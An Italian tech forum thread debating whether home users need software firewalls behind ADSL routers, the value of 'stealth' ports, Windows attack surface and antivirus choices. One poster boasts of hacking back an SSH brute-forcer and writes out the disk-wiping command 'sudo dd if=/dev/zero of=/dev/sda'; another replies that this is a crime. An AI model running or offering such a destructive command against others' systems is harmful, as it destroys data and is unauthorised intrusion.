Ho capito, ma con un modem USB non mi risultava nessuna porta in Stealth quidi era tutto "troppo scoperto"...
Ho voluto cogliere la palla al balzo e poichè adesso sono sotto W7, firewall integrato bidirezionale e con un modem usb ho voluto fare una prova:

http://uptiki.altervista.org/_altervista_ht/3qfwb3y5r2gvackkjv0_thumb.png (http://uptiki.altervista.org/viewer.php?file=3qfwb3y5r2gvackkjv0.png)

Il test è superato però c'è da dire che a default il test non si passa ed infatti mi sono creato delle regole specifiche (blocco porte 135, 445 e blocco di ICMP Echo Request) affinchè il tutto risultasse quantomeno "stealth". Ovviamente il test eseguito riguarda solo un range di porte ovvero quelle più "sensibili".

Ho voluto cogliere la palla al balzo e poichè adesso sono sotto W7, firewall integrato bidirezionale e con un modem usb ho voluto fare una prova:

http://uptiki.altervista.org/_altervista_ht/3qfwb3y5r2gvackkjv0_thumb.png (http://uptiki.altervista.org/viewer.php?file=3qfwb3y5r2gvackkjv0.png)

Il test è superato però c'è da dire che a default il test non si passa ed infatti mi sono creato delle regole specifiche (blocco porte 135, 445 e blocco di ICMP Echo Request) affinchè il tutto risultasse quantomeno "stealth". Ovviamente il test eseguito riguarda solo un range di porte ovvero quelle più "sensibili".

con windows 8 lasciato tutto di dì default mi ha bucato subito :D

brigante di un fcorbelli! :D
Sono solo un agnellino.
Se scrivessi le mie opinioni (*) mi farei un altro bel po' di giorni di sospensione.
Quindi mi limito ad imparare tante cose nuove, il che non credo sia deprecabile.


(*) le chiamo opinioni per non indicarle per quello che sono: assiomi (**)

(**) se non si capisce è autoironia

Perchè?

Se scrivi Windows fa schifo, punto!, è inevitabile perchè nell'assunto non c'è costrutto.

Se invece scrivi Windows fa schifo perchè
a)
b)
...
,
troverei incredibile la sospensione.


Non sono cioè le cose che uno scrive a decretare "le sorti" di un nick sui forum (credo, non cmq sicuramente qui), ma il modo e i contenuti che non dovrebbero essere provocatori/fini a se stessi/gratuiti/[...].

Fai 1 bel respiro e riparti, cosi' come immagino facevi con i tuoi studenti.

*

Edit: ripensamento.

Windows è il sistema più sicuro che si possa immaginare.
cvd.

Sbagli ad editare xè il post è molto buono anche se, onestamente, molte tematiche, pur in modo casereccio, sono state ormai abbondantemente trattate e assimilate (quantomeno da me, ma non solo).


Se i tuoi post sono questi, stai sicuro che nessuno ti sospende.

PS: posso quotare il tuo intervento visto che non ho ancora refreshato la pagina?


Windows è il sistema più sicuro che si possa immaginare.
cvd.
questi, invece, sono i commenti da evitare.

Se sei intelligente come credo, arrivi da solo ai motivi.

Sono solo un agnellino.
Se scrivessi le mie opinioni (*) mi farei un altro bel po' di giorni di sospensione.
Quindi mi limito ad imparare tante cose nuove, il che non credo sia deprecabile.


(*) le chiamo opinioni per non indicarle per quello che sono: assiomi (**)

(**) se non si capisce è autoironia

Edit: ripensamento.

Windows è il sistema più sicuro che si possa immaginare.
cvd.

Senza tanti inutili giri di parole, mettilo in pratica:


Lo spirito di un forum dovrebbe essere quello di trasferire conoscenza da chi sa di più a chi sa meno, con utenti che chiedono, ed altri che rispondono.
O almeno così credo, potrei sbagliare.


PS: non mi ripeto

come giudichi Outpost Firewall Pro?

la versione pro è identica ma con la possibilità di disattivare l'antivirus ed usarne un altro. Outpost è sempre un ottimo FW con un ottimo hips, pecca un po' in chiarezza negli avvisi, in questo CIS è davvero il migliore (aiutato dall'ottima traduzione su cui varie persone a suo tempo hanno sgobbato), ha però leggevo alcuni problemi su certi pc dove non parte, penso però siano casi isolati. Per me merita 7, la versione free invece avendo un AV non all'altezza sta su un 6 scarso, per quel che vale come AV sarebbe meglio stare senza usarlo, sarebbe più leggero il prodotto e ne gioverebbe sicuro.
In fondo con un buon hips e sapendolo usare un av serve a poco

PS: posso quotare il tuo intervento visto che non ho ancora refreshato la pagina?

Oggi faccio un tagliando, se trovo quindi il tempo formulo un qualcosa che abbia un minimo di organicità, ammesso che interessi a qualcuno (dubito, ma non si sa mai)

interessa...perchè sono pensieri intelligenti ed espressi in maniera finalmente :read: serena...

la versione pro è identica ma con la possibilità di disattivare l'antivirus ed usarne un altro. Outpost è sempre un ottimo FW con un ottimo hips, pecca un po' in chiarezza negli avvisi, in questo CIS è davvero il migliore (aiutato dall'ottima traduzione su cui varie persone a suo tempo hanno sgobbato), ha però leggevo alcuni problemi su certi pc dove non parte, penso però siano casi isolati. Per me merita 7, la versione free invece avendo un AV non all'altezza sta su un 6 scarso, per quel che vale come AV sarebbe meglio stare senza usarlo, sarebbe più leggero il prodotto e ne gioverebbe sicuro.
In fondo con un buon hips e sapendolo usare un av serve a poco

Grazie. :)

Qualche considerazione.

"sicurezza" è una parola-magica che copre tantissimi aspetti diversi, ed ha quindi una semantica ubiqua a dir poco.

"sicurezza" fisica? di un server? di una macchina desktop? Con quali utilizzi? etc.

Accademicamente non esiste una definizione universalmente accettata di "sicurezza", proprio perchè è relativa ad ambiti troppo diversi, un po' come dire "bellezza". Ci sono i tramonti belli, i gatti belli e così via

Discettarne richiederebbe un impegno considerevole, quindi mi limiterò a circoscrivere sensibilmente le note successive a un ben preciso ambito, ossia quello desktop-casereccio con connessione internet ADSL o 3G.
---
L'assunto che ne deriva afferisce l'utilizzo essenzialmente come client di qualcosa del computer, ovvero non esistono (o meglio non dovrebbero...) servizi esposti (*precisazione, in realtà qualcuno spesso c'è, tipicamente p2p).
Questa è la situazione migliore, segue quella per una piccola rete locale di computer, nel qual caso un servizio (* in realtà sono tipicamente più di uno, ma diciamo uno) c'è, ovvero SMB e "i suoi cugini".
Bisognerebbe però dire che, a sua volta, piccole reti di questo genere potrebbeo anche usare protocolli NON routabili (ovvero NON NETBIOS-over-TCP), però si andrebbe abbastanza lontani e quindi, sulla premessa di rimanere in una situazione "casereccia", bisognerà affrontare l'incapsulamento del servizi di rete SMB (* anche qui ci sarebbe da precisare cosa sono, perchè ne esistono 3 grandi "classi", windows, smb-samba e cifs) su IP.
---
Riassumendo lo sceMario sarà
1) computer desktop singolo collegato con un router ADSL
2) computer desktop singolo collegato con un "modem" (* in realtà non c'è alcuna modulazione-demodulazione, ma chiamiamolo modem per comodità)
3) più computer di una rete casereccia collegati a un singolo router ADSL
---
Entrando nei merito di 1) iniziamo a individuare i possibili rischi
1A) falle dello stack IP: mediante opportune connessioni "malevole" è possibile far eseguire codice "iniettato"
1B) falle del sistema operativo: alcuni servizi raggiungibili dall'esterno possono essere compromessi
1C) errori dei programmi applicativi e/o dei moduli aggiuntivi (* fondamentali, ripresi in seguito)
1D) errori umani (phishing, comporamenti kamikaze e così via)

1A) era un problema anni fa, ormai la maggior parte (se non tutti) i "buchi" gravi negli stack sono stati chiusi da tempo. Non rappresentano un problema nella configurazione considerata in quanto le "porte" (* più precisamente non solo tcp-udp, ma anche per gli altri protocolli es. icmp) non sono accessibili da internet

1B) nell'ipotesi di utilizzo di un router sono piuttosto irrilevanti, in quanto non raggiungibili dall'esterno.
Sempre lato sistema-operativo vi sono numerosi accorgimenti miranti a rendere difficile la vita a virus e simili (esecuzione protetta, rilocazione random e chi più ne ha ne metta).
Sono in realtà palliativi, in quanto un sistema compromesso è male.

1C) il disastro (* vedi dopo)

1D) sono da tenere in considerazione, soprattutto per utenti smanetton-pistolatori.
Va infatti considerato che è l'utilizzo a determinare il rischio: chi si limita a navigare sul sito di qualche quotidiano e magari dell'INPS difficilmente avrà problemi, questa è la risposta a chi tipicamente scrive "sto senza antivirus-antitutto da anni ma non mi sono mai infettato".
Questo genere di errori viene (o dovrebbe essere) mitigata da vari accorgimenti (vedere sistema operativo) che cercano di "incapsulare" i virus all'interno di un perimetro (assai interessanti le tecniche ad es. di solaris) dal quale non possono uscire.
Queste però sono cure, non prevenzioni.
---
Fermo che non esistono metodi "sicuri", vanno però smontate, prima di procedere, alcune "leggende metropolitane" che tendono a far gran confusione

#1: non esistono sistemi operativi sicuri, sono tutti uguali. Diciamo la versione "relativistica". Questo è falso, esistono sistemi che sono inerentemente più sicuri, altri meno.
Alcuni poco, altri tantissimo. Se un prodotto è molto diffuso non significa che sia necessariamente buono dal punto di vista tecnico

#2: windows è sicuro tanto quanto X, perchè X non lo usa nessuno e quindi non scrivono virus per X. E' vero, ma solo in parte. In termini generali (lato desktop) lo studio (e l'attacco) di windows sono sicuramente, e di gran lunga, più evoluti rispetto ad altri ambienti.
però (vedi #1) si sommano tre effetti: sistema operativo di bassa qualità (è un mio giudizio), ma estremamente diffuso, e con superficie d'attacco gigantesca (*vedi dopo) = il fenomeno (francamente ridicolo) dei virusmalwareantitutto su windows

#3: mac è più sicuro di windows, perchè è fico mentre windows è una merda. c'è del vero, sia perchè windows è pessimo sotto il profilo della sicurezza (quindi ci vuol proprio poco per far meglio), sia perchè mac ERA (lo è ancora, ma vedi superficie d'attacco) basato su fondamente solide (FreeBSD), sia perchè meno diffuso (#1+#2)
Purtroppo mac soffre di 1C come e più di windows, perchè i fanboy (e la stessa apple) si sono cullati nell'idea che mac fosse sicuro. non è che sia "molto" sicuro, è "un po'" meglio di windows

#4: linux è sicuro sic et simpliciter. qui c'è un fondo di verità notevole, perchè la diffusione è minima (entra in gioco il fattore-numerico), sia perchè eredita alcuni strumenti davvero belli (SEL ad esempio) e tanti altri, che "nascono" nel mondo server e sono stati "trapiantati" in parte in quello desktop.
per approfondire bisognerebbe vedere i molti approcci (ce ne sono "tanti" di linux), boh forse più avanti

---
Visto che l'ho citata diciamo 4 cavolate sulla superficie d'attacco, e magari sulla difesa in profondità.
Per superficie d'attacco si intendono le possibili vie d'entrata che sono, tipicamente, connesse a programmi in esecuzione sul computer in modo "occulto".
Un sistema operativo monotask, tipo DOS (* non però così monotask, vedi ad esempio i mitici TSR) ha una superficie ridottissima, per il semplice fatto che un virus riesce difficilmente a farsi eseguire se manca... una connessione di rete (opposto il discorso per le infezioni da programma)
Su una macchina windows "moderna" ci sono invece decine (=>centinaia) di programmi in esecuzione, senza spesso un motivo ben preciso.
Ogni programma è ovviamente difettoso (=> il software perfetto non esiste, volevo dire se non è scritto da me ;) , più ce ne sono, maggiore il rischio.

QUESTO è uno dei motivi (non l'unico) della struttura di windows inerentemente insicura, ossia l'aggiunta di un sacco di "merda" che non serve a nulla, o quasi, e che può essere compromessa.

All'estremo opposto c'è OpenBSD il quale (per chi non lo conosce) è ritenuto IL sistema operativo più sicuro oggi disponibile (non perfetto, ma qualcosa di incomparabile rispetto a Windows).

Non voglio togliere la sorpresa... chi è curioso provi a installarlo dicendo "voglio l'interfaccia grafica" ;)

Quindi difetto gigante di windows n.1: superficie d'attacco immensa
---

Ottimo intervento che merita sicuramente un'attenta lettura.

In generale, cmq, non commettere l'errore di identificare tutti gli utenti che usano una piattaforma Microsoft alla stregua di figure con "l'anello al naso"...:read: :D

Al di là di questo, confido in un tuo ulteriore approfondimento anche se probabilmente questa non è la sede* più opportuna...



*da intendersi come thread.

Buona! :)

Ciao a tutti, vi ringrazio per i threads (plurale) che avete messo in piedi riguardo la sicurezza (anche se spesso gli OP sono un pò datati :mc: ). Volevo sapere due cose al volo:
- mi serve un consiglio riguardo un firewall software, requisito essenziale è la leggerezza. Quindi, come indicato da Romagnolo qualche pagina dietro, OA è da scartare. Resterebbero Comodo, Outpost e Private Defender (mi sono perso qualcuno altro di importante?), oltre a Windows 7 Firewall Control eventualmente. Romagnolo, potresti in 2 righe contate dirmi quali sono queste funzionalità fuffa/marketing della suite Avast?
Come AV avevo pensato ad Avast (visto il requisito indispensabile: leggerezza, pochi accessi HD e cose così) + FW, visto il sistema Celeron 1GB RAM, non sempre connesso a Internet, posso non mettere altro? Avevo pensato alla suite completa Avast+firewall a parte però non so se mi conviene comprare la licenza ora, e visto il sistema preferirei buttarmi sul tuttofree. Le Suite 2013 non dovrebbero uscire a breve?
- una cosa che non so: un mio amico aveva Eset Internet Security (la suite completa) e settando una rete come pubblica, nonostante avesse consentito al suo client torrent tutte le comunicazioni entrata/uscita UDP/TCP e chi più ne ha più ne metta, il client non dava segni di vita. Ha sbagliato qualche configurazione o dipende dal fatto che la rete era pubblica e il firewall ha fatto capricci per sta cosa e ha bloccato cmq quel tipo di connessione?

Ciao a tutti, vi ringrazio per i threads (plurale) che avete messo in piedi riguardo la sicurezza (anche se spesso gli OP sono un pò datati :mc: ). Volevo sapere due cose al volo:
- mi serve un consiglio riguardo un firewall software, requisito essenziale è la leggerezza. Quindi, come indicato da Romagnolo qualche pagina dietro, OA è da scartare. Resterebbero Comodo, Outpost e Private Defender (mi sono perso qualcuno altro di importante?), oltre a Windows 7 Firewall Control eventualmente. Romagnolo, potresti in 2 righe contate dirmi quali sono queste funzionalità fuffa/marketing della suite Avast?
Come AV avevo pensato ad Avast (visto il requisito indispensabile: leggerezza, pochi accessi HD e cose così) + FW, visto il sistema Celeron 1GB RAM, non sempre connesso a Internet, posso non mettere altro? Avevo pensato alla suite completa Avast+firewall a parte però non so se mi conviene comprare la licenza ora, e visto il sistema preferirei buttarmi sul tuttofree. Le Suite 2013 non dovrebbero uscire a breve?
- una cosa che non so: un mio amico aveva Eset Internet Security (la suite completa) e settando una rete come pubblica, nonostante avesse consentito al suo client torrent tutte le comunicazioni entrata/uscita UDP/TCP e chi più ne ha più ne metta, il client non dava segni di vita. Ha sbagliato qualche configurazione o dipende dal fatto che la rete era pubblica e il firewall ha fatto capricci per sta cosa e ha bloccato cmq quel tipo di connessione?
su un pc ho la suite Avast Internet security e funziona bene non è pesante e non rallenta nulla, a ogni aggiornamento di versione sia da 2011 a 2012 o numero di programma è automatico e gratis finchè non ti scade

Ak ok quindi mi porterei dietro la licenza, non lo sapevo, però a sto punto se devo andare sul pagamento vado sulla suite di F-Secure, ho avuto un'esperienza passata positiva (anzi la migliore fino a ora), però spendere per un pc del genere non so se mi va :ciapet: per l'AV ci penso su (a mettere Avast free sto un attimo).

Ak ok quindi mi porterei dietro la licenza, non lo sapevo, però a sto punto se devo andare sul pagamento vado sulla suite di F-Secure, ho avuto un'esperienza passata positiva (anzi la migliore fino a ora), però spendere per un pc del genere non so se mi va :ciapet: per l'AV ci penso su (a mettere Avast free sto un attimo).

Se ti interessa, su F-secure 2011 c'è una promo gratuita:

http://www.hwupgrade.it/forum/showpost.php?p=37578935&postcount=4551

Volevo sapere due cose al volo:
- mi serve un consiglio riguardo un firewall softwareDomanda: usi un router ADSL?
Sì? Ti consiglio il firewall software più leggero, il niente

Domanda: usi un router ADSL?
Sì? Ti consiglio il firewall software più leggero, il niente

http://www.hwupgrade.it/forum/showthread.php?t=2474898

http://www.hwupgrade.it/forum/showthread.php?t=2474898

Embhè?
La risposta data in quel thread "servono entrambi" è a mio parere sbagliata.

...Nessuna nessuna? E quelle non aperte risultavano tutte chiuse? Semplicemente il Personal Firewall Software non funzionava o era disattivato.



Saluti.

Scusa se ho risposto in ritardo, ho da poco letto le precedenti discusioni.

Con il solo uso del firewall software tramite modem USB mi risultavano solo alcune porte in stealth, ora non ricordo quali di preciso ma sicuramente erano in stealth le porte più a rischio, il resto delle porte invece erano semplicemente chiuse.

Poi ricordo che acquistai un router senza firewall integrato, esattamente uno Zyxel Prestige 650 ME ADSL 1 - no WI-FI (max 7 MB supportati) e anche qui ricordo che non tutte le porte mi risultavano in stealth, poi abbandonai questo router che tra l'altro non era nemmeno stabile perchè ogni tanto mi saltava la connessione e acquistai un Alice Gate Voip WI-FI ADSL 2+ Dial Face con firewall di base integrato e da allora finalmente tutte le porte mi risultano in stealth su qualsiasi Portscan effettuato in internet.

Questo router (di mia proprietà) lo uso tutt'ora con soddisfazione, la connessione 10MB è stabile e le porte mi risultano tutte in stealth anche senza l'utilizzo di nessun firewall software :p

Embhè?
La risposta data in quel thread "servono entrambi" è a mio parere sbagliata.

Devi anche considerare la "preparazione" di un utente.
Io ad esempio tempo addietro avevo installato di tutto e di piu' nel mio computer, ora ho ridimensionato il tutto.

Se ad un utente che su una pagina internet clicca su tutto indiscriminatamente ma che comunque e' abbastanza intelligente e sveglio (senza offendere nessuno perche' ci son passato pure io) da capire/intuire che deve in un certo qualmodo premunirsi contro eventuali insidie della rete gli si dice che un firewall software e' inutile. . . bhe'. . .
Suppongo che a questo punto potrebbero inutili anche antivirus et similia. . .

L'utilizzatore del computer puo' star attento a qualsiasi cosa, ma spesso i malware si camuffano cosi' tanto bene che purtroppo software come antivirus e firewall almeno, sono imprescindibili dall'essere installati su una macchina. Quale tipo/marca poi, sta a loro scegliere in base all'utilizzo, alla loro conoscenza, alle risorse del pc ecc.ecc.

Almeno questo secondo il mio modesto punto di vista.

Tu sei un utente molto preparato, ho gia' letto diversi tuoi interventi su questo ed altri topic; un ragazzo che chiede informazioni non puo' essere a tuo livello, farebbe a meno di chiedere no? :rolleyes:
Quindi, gli si cerca di dare una mano nel migliore dei modi ed in base alle proprie conoscenze.

Devi anche considerare la "preparazione" di un utente (...)In questo caso la situazione è assai più semplice.
Se si utilizza un router ADSL un firewall software non serve a nulla.
Lo riscrivo: a nulla.
Non è questione di maggior o minor competenze.

Un firewall utilizzato per bloccare le connessioni dall'esterno (* prima o poi bisogna che riscriva per bene perchè le porte "stealth" non aggiungono nessuna sicurezza) verso porte e servizi potenzialmente vulnerabili, che è poi l'utilizzo tipico per uso casereccio, è totalmente inutile con un router che droppa tutti i pacchetti senza instradarli verso uno degli host della LAN (situazione normale).

L'uso per il controllo del traffico interno-esterno è parimenti inutile in ambito casereccio, perchè sapere quali siano le mie connessioni, o controllarle, è francamente poco rilevante (oltre che ottenibile banalmente con un netstat su windows, se uno è proprio curioso)
---
Un firewall (hardware o software è uguale, ovviamente "hardware" significa semplicemente "software" a sua volta) interno-esterno ha lo scopo, tipicamente, di IMPEDIRE l'utilizzo di certi servizi.
Esempio bloccare messenger o skype (* per skype la situazione è piuttosto complicata ma fermo qui), impedire l'utilizzo della posta elettronica, emule etc.

Tutte attività che mi paiono difficilmente interessanti in ambito casareccio.
---
L'ulteriore funzione, ovvero quello di "impedire" il diffondersi di "infezioni", ovvero tentar di bloccare un attacco che arriva dalla LAN (esempio: più computer infetti in rete locale) non ha, nuovamente, un grandissimo senso.
Sia perchè se ho un computer solo => non mi arriva nessun attacco.
Sia perchè gli "attacchi" LAN sono poco diffusi e quasi praticamente inutili (* lato-windows avvengono tipicamente sulla 139 per la condivisione NBT, ma lì il firewall non fa tra il nulla ed il quasi nulla)
---
Ecco perchè (versione breve)
- hai un router ADSL?
- hai un singolo computer?
- > non serve a nulla un firewall software, anzi è negativo perchè aumenta la superficie d'attacco e quindi, paradossalmente, la vulnerabilità
---
Poi queste sono le mie conclusioni, magari qualcuno argomenta qualcosa di diverso, ma NON sulla falsariga "male non fa... meglio metterlo... non si sa mai..." e così via.

Con il solo uso del firewall software tramite modem USB mi risultavano solo alcune porte in stealth...
Diciamo qualcosina rapida (magari se trovo il tempo, cioè no, vediamo come funziona una connessione IP).
Le porte "stealth" non aggiungono sicurezza rispetto a quelle "closed".
La differenza riguarda al metodo di (non) risposta, ovvero il drop del pacchetto oppure no.
La scansione delle porte aveva (una volta, nel jurassico, diciamo un 4 anni fa) un suo senso, soprattutto mirato verso le porte 139 (mitica voragine microsoft), ma anche 23 (telnet, spesso di router con accesso dall'esterno con nome utente e password di default, nel caso di zyxel menzionato 1234).
A "quel tempo" è iniziata la moda del firewall stealth, sull'ipotesi che se non si capisce che un certo IP è attivo, allora è più sicuro.
---
Il che è falso, per vari motivi.
Innanzitutto le scansioni su internet mirano (oltre alle porte sopra indicate) ad individuare demoni ssh con password facili da identificare sulla 22 (chiunque amministra un server lo sa benissimo).
Sia per ricerche di porte 80 per vulnerabilità varie su server web e (soprattutto) accessi "standard" con password deboli a CMS e servizi vari (wordpress etc)
L'idea secondo la quale un attaccante si "concentrerebbe" su un certo host, senza alcun motivo particolare se non quello di aver trovato delle porte "closed" anzichè "stealth", è nei fatti irrealistico
---
Versione breve: "stealth" è bene? Sì
"non stealth" significa rischio? Solo marginalmente, per non dire (praticamente) no
---
Personalmente mi piace navigare su un portatile con chiavetta SENZA nessun tipo di firewall, con perfino la condivisione SMB attiva.
Finora non mi è successo nulla (* qui c'è l'argomento "uso-del-computer-e-leggende-metropolitane), però bisogna dire che non uso Windows nè ho password facili da trovare.
L'utilizzo di una connessione "simil-dial-up", quindi con IP dinamico ad ogni riavvio, mi rende tranquillo anche verso eventuali (e del tutto fantasiosi) tentativi DoS.
---
E' decisamente più saggio "spendere" tempo ed attenzioni per le VERE fonti di rischio odierne (per computer usati casarecciamente), piuttosto che per altri aspetti marginali.
Come preoccuparsi di blindare la presa d'aria della caldaia lasciando però spalancate porte e finestre.

Spesso chi attacca è un pivello, ne ho esperienza di un tizio che mi rovesciò un dizionario enorme su ssh. Feci altrettanto su di lui e gli aprì il c***
sudo dd if=/dev/zero of=/dev/sda :D :D e non ho più subito attacchi così massicci; -.-" almeno si fosse protetto dietro proxy

Scusa se ho risposto in ritardo, ho da poco letto le precedenti discusioni.

Con il solo uso del firewall software tramite modem USB mi risultavano solo alcune porte in stealth, ora non ricordo quali di preciso ma sicuramente erano in stealth le porte più a rischio, il resto delle porte invece erano semplicemente chiuse.

Malfunzionamento o impostazioni balorde del personal firewall software IMHO.

Poi ricordo che acquistai un router senza firewall integrato, esattamente uno Zyxel Prestige 650 ME ADSL 1 - no WI-FI (max 7 MB supportati) e anche qui ricordo che non tutte le porte mi risultavano in stealth,


E qui invece è normale, vedevi lo stato delle porte del router che ripondevano "aperta" o "chiusa" e se non c'era firewall non dovevano essercene in stealth.


poi abbandonai questo router che tra l'altro non era nemmeno stabile perchè ogni tanto mi saltava la connessione e acquistai un Alice Gate Voip WI-FI ADSL 2+ Dial Face con firewall di base integrato e da allora finalmente tutte le porte mi risultano in stealth su qualsiasi Portscan effettuato in internet.



Una porta chiusa non è sinonimo di debolezza o vulnerabilità quindi lo stato stealth non è uan cosa da ricercare con assoluta abnegazione soprattutto nel caso di computer collegato a router. Le macchine che stanno dall'altra parte continuano a "non vedere" il tuo PC ma vedono solo il router, un eventuale aggressore dovrebbe ciullarsi il router prima, cosa normalmente e generalmente non facile da conseguire per una serie di valide ragioni. Il che non toglie che esiste una regola fissa della sicurezza che dice che è meglio una barriera in più che una in meno (fa tanto Massimo Catalano¹), ma ripeto il firewall sul router casalingo o da piccolo ufficio con le sue caratteristiche e funzionalità non è così basilare ed importatante da non perderci il sonno.

Questo router (di mia proprietà) lo uso tutt'ora con soddisfazione, la connessione 10MB è stabile e le porte mi risultano tutte in stealth anche senza l'utilizzo di nessun firewall software :p

Mi pare di capire che non hai ancora compreso appieno la situazione, lo ripeto che male non fa :) Quando fai una scansione da internet verso di te stai scansionando le porte del tuo router non quelle del tuo PC, è del tutto logico e normale che l'eventuale personal firewall software o PFS installato sul PC è irrilevante, o c'è o non c'è nulla cambia. Ulteriore riprova, collega direttamente il tuo PC dotato di personal firewall software ad internet tramite modem USB o chiavetta internet, e guarda il log del PFS notando il quantitativo di tentativi di scansioni ricevute, generalmente in maniera terroristica vengono definiti "attacchi" devono pur far leva sulle paure dell'utenza per giustificare la vendita del giocattolo :)
Poi collega lo stesso PC con il router di mezzo e vedrai il quantitativo di pericolsissimi attacchi crollare di brutto. Che è successo? È successo che le scansioni adesso se le becca il router ed il tuo smagliante PFS non le vede più.



¹ Massimo Catalano per i più giovani: http://www.youtube.com/watch?v=iMWsLDnbIsA



Saluti.

Spesso chi attacca è un pivello, ne ho esperienza di un tizio che mi rovesciò un dizionario enorme su ssh. Feci altrettanto su di lui e gli aprì il c***
sudo dd if=/dev/zero of=/dev/sda :D :D e non ho più subito attacchi così massicci; -.-" almeno si fosse protetto dietro proxy

Fossi in te non farei certe cose, sono da uno a cinque anni di carcere, accesso abusivo a sistema informativo, art. 615 ter codice penale, comma III.
Ne ho proprio uno simile tra le mani or ora.

In generale, cmq, non commettere l'errore di identificare tutti gli utenti che usano una piattaforma Microsoft alla stregua di figure con "l'anello al naso"...:read: :D
E perchè mai?
Cos'è, una ulteriore leggenda metropolitana?
Uso Windows dalla versione 2, ho perfino qua in studio i floppy di OS/2 e un cd di NT 3.51 (rigorosamente in inglese), ora in questo momento sto usando Windows 7, e "campo" vendendo programmi per Windows.

Solo un fanboy bimbominkia o simile ritiene "mac-per-sempre" o "linux-forever" o "windows-huber-alles". Personalmente uso\vendo\amministro Windows, Linux (ho fatto la prima traduzione italiana di slax), BSD, Mac, Solaris, Amiga.

Non è che quando accendo una macchina Windows mi esce un anello dal naso :stordita: Però quando voglio sicurezza... la lascio spenta ;)

Se ti interessa, su F-secure 2011 c'è una promo gratuita:

http://www.hwupgrade.it/forum/showpost.php?p=37578935&postcount=4551

Ottima segnalazione! Se non ho visto male av-comparatives l'aveva segnalato come best product della passata stagione. Però ora ho già messo su Avast free (registrato) e vedo che non dà problemi al pc, voglia di disinstallare al momento zero :muro: Sapete darmi una differenza a livello di pesantezza tra i 2?

Domanda: usi un router ADSL?
Sì? Ti consiglio il firewall software più leggero, il niente

Il problema è un altro. Lo uso solo su una rete mia dove le mani ci metto io?
No. Perchè magaro lo uso da un amico, in una biblioteca, in un hotel...e cosa so io cosa c'è di protezione, che buchi ci sono o se qualcuno ci sta facendo qualcosa? Per questo mi interessa un consiglio per un fw tra quelli che ho elencato (leggendo un pò ovunque i nomi che tornano sono quelli) ma che sia leggero, anzi leggerissimo a livello di risorse. Poi se uno è un pò peggio dell'altro le mani ce le metto io sopra (non fidatevi troppo del mio nick!).

Il problema è un altro. Lo uso solo su una rete mia dove le mani ci metto io?
No. Perchè magaro lo uso da un amico, in una biblioteca, in un hotel...e cosa so io cosa c'è di protezione, che buchi ci sono o se qualcuno ci sta facendo qualcosa? Per questo mi interessa un consiglio per un fw tra quelli che ho elencato (leggendo un pò ovunque i nomi che tornano sono quelli) ma che sia leggero, anzi leggerissimo a livello di risorse. Poi se uno è un pò peggio dell'altro le mani ce le metto io sopra (non fidatevi troppo del mio nick!).
Non è che cambi un granchè, da amico, biblioteca ed hotel.
Comunque il più leggero, anzi leggerissimo, altro non è che il firewall integrato in windows, perfettamente adatto, con la semplice impostazione "senza eccezione".
Gratis, sicuro, e leggero.

...Però quando voglio sicurezza... la lascio spenta ;)

...io invece ho solo 7 e, volente o nolente, posso usare solo questo anche là dove abbia necessità di compiere operazioni critiche...:sborone:

Ti dirò a parte una 20ina di anni fa, quando mIRC mi ha segnalato che qualcuno stava facendo qualcosa sul mio pc, problemi non ne ho mai avuti. E ho pure usato un pc senza niente sopra (nemmeno antivirus per controllo penne usb, tanto non era connesso ad alcuna rete e alla fine mi è andata bene). A me interessa sapere se, dato che questo pc lo uso anche su reti di cui non so sostanzialmente nulla, un firewall può servirmi per difendermi dall'esterno. Perchè tramite navigazione web mia personale è abbastanza difficile (il 100% non lo metto mai su nulla) che faccia dei danni.

Ottima segnalazione! Se non ho visto male av-comparatives l'aveva segnalato come best product della passata stagione. Però ora ho già messo su Avast free (registrato) e vedo che non dà problemi al pc, voglia di disinstallare al momento zero :muro: Sapete darmi una differenza a livello di pesantezza tra i 2?
.......

Sono ambedue leggeri, F-secure ha qualcosa in più, rispetto ad Avast e anche ad Avira, sulla rilevazione degli spyware, almeno rispetto alla versione 5 (le sucessive non le ho provate).

Sono ambedue leggeri, F-secure ha qualcosa in più, rispetto ad Avast e anche ad Avira, sulla rilevazione degli spyware, almeno rispetto alla versione 5 (le sucessive non le ho provate).

Ottimo come pensavo, infatti leggendo il punto debole di Avast è il repair. Ho già trovato un'altra macchina a cui mettere quell'F-Secure :O grazie!

A me interessa sapere se, dato che questo pc lo uso anche su reti di cui non so sostanzialmente nulla, un firewall può servirmi per difendermi dall'esterno.Se non attivi la condivisione windows la risposta è no (comprese le condivisioni $ nascoste).
Però, come detto, se vuoi un livello ulteriore attiva banalmente il firewall di windows, senza eccezioni, e fine delle preoccupazioni (sotto questo profilo)

Se non attivi la condivisione windows la risposta è no (comprese le condivisioni $ nascoste).

Intendi il servizio? Di solito tengo disabilitato le "opzioni di condivisione" (individuazione rete/condivisione file) sotto rete pubblica (win7).

Intendi il servizio? Di solito tengo disabilitato le "opzioni di condivisione" (individuazione rete/condivisione file) sotto rete pubblica (win7).Se togli le eccezioni dal firewall è inutile.
Se lo tieni disattivato cosa buona e giusta è, in prima battuta, togliere le condivisioni (normali e nascoste), in seconda fermare proprio il servizio server con un brutalissimo net stop server

e se vuoi fermare delle connessioni di programmi in uscita il firewall serve giusto?

e se vuoi fermare delle connessioni di programmi in uscita il firewall serve giusto?

Sì, ma fammi un esempio pratico di quando è utile farlo.

Sì, ma fammi un esempio pratico di quando è utile farlo.

potrebbe essere il caso di un malware non-persistente che "funziona" in RAM:
al suo tentativo di instaurare una connessione verso l'esterno per trasferire i dati catturati, il Firewall potrebbe registrare l'anomalia specie se dovesse utilizzare porte che solitamente non sono utilizzate dal browser...

Nel mio caso, cmq, siamo nel campo delle ipotesi...



Personalmente xò sono molto più interessato a tutto il discorso della debolezza della piattaforma Microsoft (parlavi della superficie di rischio, delle debolezze dell'UAC, delle tecnologie di mitigazione inadeguate,...):
mi auguro dunque che arrivi quanto prima il momento in cui decidi di toccare questo capitolo...
PS: se vuoi, puoi usare questo (http://www.hwupgrade.it/forum/showthread.php?t=1064733) therad.

potrebbe essere il caso di un malware non-persistente che "funziona" in RAM:
al suo tentativo di instaurare una connessione verso l'esterno per trasferire i dati catturati, il Firewall potrebbe registrare l'anomalia specie se dovesse utilizzare porte che solitamente non sono utilizzate dal browser...... e quindi? La macchina è già infetta, il firewall non servirebbe a nulla, in questo caso, per aumentarne la sicurezza, visto che è già compromessa

Personalmente xò sono molto più interessato a tutto il discorso della debolezza della piattaforma Microsoft ...
PS: se vuoi, puoi usare questo (http://www.hwupgrade.it/forum/showthread.php?t=1064733) therad.

mi trasferisco di là

